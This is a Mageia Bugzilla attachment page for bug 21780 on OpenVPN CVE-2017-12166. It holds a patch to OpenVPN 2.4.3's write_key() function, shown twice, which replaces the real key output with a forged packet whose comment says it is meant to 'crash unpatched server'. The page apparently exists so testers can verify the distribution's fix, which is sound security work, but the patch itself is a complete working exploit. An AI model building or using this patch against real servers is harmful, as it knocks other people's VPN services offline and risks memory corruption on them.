Mageia Bugzilla – Attachment 9716 Details for
Bug 21780
openvpn new security issue CVE-2017-12166
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
[patch]
Patch against openvpn 2.4.3 to exploit CVE-2017-12166
openvpn_exploit_test.patch (text/plain), 1.32 KB, created by
Josua Dietze
on 2017-10-10 23:01:42 CEST
(
hide
)
Description:
Patch against openvpn 2.4.3 to exploit CVE-2017-12166
Filename:
MIME Type:
Creator:
Josua Dietze
Created:
2017-10-10 23:01:42 CEST
Size:
1.32 KB
patch
obsolete
>--- openvpn-2.4.3/src/openvpn/crypto.c.orig 2017-06-20 13:07:22.000000001 +0200 >+++ openvpn-2.4.3/src/openvpn/crypto.c 2017-10-10 22:49:18.749821813 +0200 >@@ -1634,23 +1634,41 @@ write_key(const struct key *key, const s > ASSERT(kt->cipher_length <= MAX_CIPHER_KEY_LENGTH > && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); > >- if (!buf_write(buf, &kt->cipher_length, 1)) >- { >- return false; >- } >- if (!buf_write(buf, &kt->hmac_length, 1)) >+/* Create fake key packet to crash unpatched server */ >+ >+ uint8_t fake_len = 0x7f; >+ uint8_t fake_data[0xff]; >+ >+ if (!buf_write(buf, &fake_len, 1)) > { > return false; > } >- if (!buf_write(buf, key->cipher, kt->cipher_length)) >+ if (!buf_write(buf, &fake_len, 1)) > { > return false; > } >- if (!buf_write(buf, key->hmac, kt->hmac_length)) >+ if (!buf_write(buf, fake_data, 0xff)) > { > return false; > } > >+// if (!buf_write(buf, &kt->cipher_length, 1)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, &kt->hmac_length, 1)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, key->cipher, kt->cipher_length)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, key->hmac, kt->hmac_length)) >+// { >+// return false; >+// } >+ > return true; > } >
--- openvpn-2.4.3/src/openvpn/crypto.c.orig 2017-06-20 13:07:22.000000001 +0200 +++ openvpn-2.4.3/src/openvpn/crypto.c 2017-10-10 22:49:18.749821813 +0200 @@ -1634,23 +1634,41 @@ write_key(const struct key *key, const s ASSERT(kt->cipher_length <= MAX_CIPHER_KEY_LENGTH && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); - if (!buf_write(buf, &kt->cipher_length, 1)) - { - return false; - } - if (!buf_write(buf, &kt->hmac_length, 1)) +/* Create fake key packet to crash unpatched server */ + + uint8_t fake_len = 0x7f; + uint8_t fake_data[0xff]; + + if (!buf_write(buf, &fake_len, 1)) { return false; } - if (!buf_write(buf, key->cipher, kt->cipher_length)) + if (!buf_write(buf, &fake_len, 1)) { return false; } - if (!buf_write(buf, key->hmac, kt->hmac_length)) + if (!buf_write(buf, fake_data, 0xff)) { return false; } +// if (!buf_write(buf, &kt->cipher_length, 1)) +// { +// return false; +// } +// if (!buf_write(buf, &kt->hmac_length, 1)) +// { +// return false; +// } +// if (!buf_write(buf, key->cipher, kt->cipher_length)) +// { +// return false; +// } +// if (!buf_write(buf, key->hmac, kt->hmac_length)) +// { +// return false; +// } + return true; }
View Attachment As Diff
View Attachment As Raw
Actions:
View
|
Diff
Attachments on
bug 21780
: 9716 |
9733